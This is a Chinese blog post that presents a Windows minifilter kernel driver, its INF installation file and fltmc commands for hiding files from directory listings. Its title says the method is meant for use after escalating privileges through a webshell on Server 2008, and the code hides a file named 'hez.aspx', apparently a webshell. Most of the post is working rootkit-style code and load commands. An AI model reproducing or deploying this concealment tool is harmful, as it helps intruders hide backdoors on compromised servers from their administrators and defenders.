server2008 加载驱动隐藏文件或文件夹方法,可在webshell下提权后使用,付切实可行办法
程序员文章站
2022-07-15 11:07:22
...
先附上驱动代码,如何调试亲自行查询网上资料,解决windows资源管理器刷新驱动在vs2013下断点需要问题,看代码
原因很简单,不要用sc
start启动驱动服务,这样启动
#include <fltKernel.h>
#include <dontuse.h>
#include <suppress.h>
#pragma prefast(disable:__WARNING_ENCODE_MEMBER_FUNCTION_POINTER, "Not valid for kernel mode drivers")
PFLT_FILTER filterHandle;
PWCHAR prefixName = L"hez.aspx";//要隐藏的文件名字
/*************************************************************************
Prototypes
*************************************************************************/
NTSTATUS DriverEntry(__in PDRIVER_OBJECT DriverObject, __in PUNICODE_STRING RegistryPath);
NTSTATUS PtUnload(__in FLT_FILTER_UNLOAD_FLAGS Flags);
FLT_POSTOP_CALLBACK_STATUS
HideFilePostDirCtrl(
__inout PFLT_CALLBACK_DATA Data,
__in PCFLT_RELATED_OBJECTS FltObjects,
__in_opt PVOID CompletionContext,
__in FLT_POST_OPERATION_FLAGS Flags);
#ifdef ALLOC_PRAGMA
#pragma alloc_text(INIT, DriverEntry)
#pragma alloc_text(PAGE, PtUnload)
#endif
CONST FLT_OPERATION_REGISTRATION Callbacks[] =
{
{ IRP_MJ_DIRECTORY_CONTROL,
0,
NULL,
HideFilePostDirCtrl },
{ IRP_MJ_OPERATION_END }
};
CONST FLT_REGISTRATION FilterRegistration =
{
sizeof(FLT_REGISTRATION), // Size
FLT_REGISTRATION_VERSION, // Version
0, // Flags
NULL, // Context
Callbacks, // Operation callbacks
PtUnload, // MiniFilterUnload
NULL, // InstanceSetup
NULL, // InstanceQueryTeardown
NULL, // InstanceTeardownStart
NULL, // InstanceTeardownComplete
NULL, // GenerateFileName
NULL, // GenerateDestinationFileName
NULL // NormalizeNameComponent
};
NTSTATUS DriverEntry(__in PDRIVER_OBJECT DriverObject, __in PUNICODE_STRING RegistryPath)
{
NTSTATUS status;
UNREFERENCED_PARAMETER(RegistryPath);
status = FltRegisterFilter(DriverObject, &FilterRegistration, &filterHandle);
if (NT_SUCCESS(status))
{
status = FltStartFiltering(filterHandle);
if (!NT_SUCCESS(status))
{
FltUnregisterFilter(filterHandle);
}
}
return status;
}
NTSTATUS PtUnload(__in FLT_FILTER_UNLOAD_FLAGS Flags)
{
UNREFERENCED_PARAMETER(Flags);
PAGED_CODE();
FltUnregisterFilter(filterHandle);
return STATUS_SUCCESS;
}
FLT_POSTOP_CALLBACK_STATUS
HideFilePostDirCtrl(
__inout PFLT_CALLBACK_DATA Data,
__in PCFLT_RELATED_OBJECTS FltObjects,
__in_opt PVOID CompletionContext,
__in FLT_POST_OPERATION_FLAGS Flags)
{
ULONG nextOffset = 0;
int modified = 0;
int removedAllEntries = 1;
PVOID SafeBuffer;
PFILE_ID_BOTH_DIR_INFORMATION currentFileInfo = 0;
PFILE_ID_BOTH_DIR_INFORMATION nextFileInfo = 0;
PFILE_ID_BOTH_DIR_INFORMATION previousFileInfo = 0;
UNICODE_STRING fileName;
UNREFERENCED_PARAMETER(FltObjects);
UNREFERENCED_PARAMETER(CompletionContext);
if (FlagOn(Flags, FLTFL_POST_OPERATION_DRAINING))
{
return FLT_POSTOP_FINISHED_PROCESSING;
}
//vista或win7返回的FileInformationClass结构不再是FileBothDirectoryInformation.
//而是FileidBothDirectoryInformation
if (Data->Iopb->MinorFunction == IRP_MN_QUERY_DIRECTORY &&
(Data->Iopb->Parameters.DirectoryControl.QueryDirectory.FileInformationClass == FileIdBothDirectoryInformation) &&
Data->Iopb->Parameters.DirectoryControl.QueryDirectory.Length > 0 &&
NT_SUCCESS(Data->IoStatus.Status))
{
if (Data->Iopb->Parameters.DirectoryControl.QueryDirectory.MdlAddress != NULL)
{
SafeBuffer = MmGetSystemAddressForMdlSafe(
Data->Iopb->Parameters.DirectoryControl.QueryDirectory.MdlAddress,
NormalPagePriority);
}
else
{
SafeBuffer = Data->Iopb->Parameters.DirectoryControl.QueryDirectory.DirectoryBuffer;
}
if (SafeBuffer == NULL)
{
return FLT_POSTOP_FINISHED_PROCESSING;
}
currentFileInfo = (PFILE_ID_BOTH_DIR_INFORMATION )SafeBuffer;
previousFileInfo = currentFileInfo;
do
{
//Byte offset of the next FILE_BOTH_DIR_INFORMATION entry
nextOffset = currentFileInfo->NextEntryOffset;
nextFileInfo = (PFILE_ID_BOTH_DIR_INFORMATION )((PCHAR)(currentFileInfo)+nextOffset);
// 如果要隐藏的文件夹在FILE_BOTH_DIR_INFORMATION的第一个情况 需要特殊处理
if ((previousFileInfo == currentFileInfo) &&
(_wcsnicmp(currentFileInfo->FileName, prefixName, wcslen(prefixName)) == 0 &&
(currentFileInfo->FileNameLength == 2)))
{
RtlCopyMemory(currentFileInfo->FileName, L".", 2);
currentFileInfo->FileNameLength = 0;
FltSetCallbackDataDirty(Data);
return FLT_POSTOP_FINISHED_PROCESSING;
}
//若满足条件,隐藏之
if (_wcsnicmp(currentFileInfo->FileName, prefixName, wcslen(prefixName)) == 0 && (currentFileInfo->FileNameLength == 2))
{
if (nextOffset == 0)
{
previousFileInfo->NextEntryOffset = 0;
}
else
{
previousFileInfo->NextEntryOffset = (ULONG)((PCHAR)currentFileInfo - (PCHAR)previousFileInfo) + nextOffset;
}
modified = 1;
}
else
{
removedAllEntries = 0;
//前驱结点指针后移
previousFileInfo = currentFileInfo;
}
//当前指针后移
currentFileInfo = nextFileInfo;
} while (nextOffset != 0);
if (modified)
{
if (removedAllEntries)
{
Data->IoStatus.Status = STATUS_NO_MORE_FILES;
}
else
{
FltSetCallbackDataDirty(Data);
}
}
}
return FLT_POSTOP_FINISHED_PROCESSING;
}具体方法:驱动复制到虚拟机inf右键点安装,然后fltmc load FsFilter2
fltmc attach FsFilter2 c: -a 150000
其中 FsFilter2 驱动名 150000是优先级,使用fltmc可以看所有微驱动只要比luafv高就可以
fltmc load FsFilter2
fltmc attach FsFilter2 c: -a 150000
这2条命令就搞定
卸载命令是
fltmc unload FsFilter2
我已在虚拟机server2008r2实现成功可以隐藏文件或文件夹
原因是默认驱动高度模版attributes=高度未定义
这样定义就可以
;;;
;;; FsFilter2
;;;
[Version]
Signature = "$Windows NT$"
; TODO - Change the Class and ClassGuid to match the Load Order Group value, see http://msdn.microsoft.com/en-us/windows/hardware/gg462963
; Class = "ActivityMonitor" ;This is determined by the work this filter driver does
; ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Load Order Group value
Class = "_TODO_Change_Class_appropriately_"
ClassGuid = {_TODO_Change_ClassGuid_appropriately_}
Provider = %ManufacturerName%
DriverVer =
CatalogFile = FsFilter2.cat
[DestinationDirs]
DefaultDestDir = 12
MiniFilter.DriverFiles = 12 ;%windir%\system32\drivers
;;
;; Default install sections
;;
[DefaultInstall]
OptionDesc = %ServiceDescription%
CopyFiles = MiniFilter.DriverFiles
[DefaultInstall.Services]
AddService = %ServiceName%,,MiniFilter.Service
;;
;; Default uninstall sections
;;
[DefaultUninstall]
DelFiles = MiniFilter.DriverFiles
[DefaultUninstall.Services]
DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting
;
; Services Section
;
[MiniFilter.Service]
DisplayName = %ServiceName%
Description = %ServiceDescription%
ServiceBinary = %12%\%DriverName%.sys ;%windir%\system32\drivers\
Dependencies = "FltMgr"
ServiceType = 2 ;SERVICE_FILE_SYSTEM_DRIVER
StartType = 0 ;SERVICE_DEMAND_START
ErrorControl = 1 ;SERVICE_ERROR_NORMAL
; TODO - Change the Load Order Group value, see http://connect.microsoft.com/site221/content/content.aspx?ContentID=2512
; LoadOrderGroup = "FSFilter Activity Monitor"
LoadOrderGroup = "_TODO_Change_LoadOrderGroup_appropriately_"
AddReg = MiniFilter.AddRegistry
;
; Registry Modifications
;
[MiniFilter.AddRegistry]
HKR,,"DebugFlags",0x00010001 ,0x0
HKR,,"SupportedFeatures",0x00010001,0x3
HKR,"Instances","DefaultInstance",0x00000000,%DefaultInstance%
HKR,"Instances\"%Instance1.Name%,"Altitude",0x00000000,409999
HKR,"Instances\"%Instance1.Name%,"Flags",0x00010001,0
;
; Copy Files
;
[MiniFilter.DriverFiles]
%DriverName%.sys
[SourceDisksFiles]
FsFilter2.sys = 1,,
[SourceDisksNames]
1 = %DiskId1%,,,
;;
;; String Section
;;
[Strings]
; TODO - Add your manufacturer
ManufacturerName = "Template"
ServiceDescription = "FsFilter2 Mini-Filter Driver"
ServiceName = "FsFilter2"
DriverName = "FsFilter2"
DiskId1 = "FsFilter2 Device Installation Disk"
;Instances specific information.
DefaultInstance = "FsFilter2 Instance"
Instance1.Name = "FsFilter2 Instance"
; TODO - Change the altitude value, see http://connect.microsoft.com/site221/content/content.aspx?ContentID=2512
;Instance1.Altitude = "370030"
Instance.Altitude = "_TODO_Change_Altitude_appropriately_"
Instance1.Flags = 0x0 ; Allow all attachments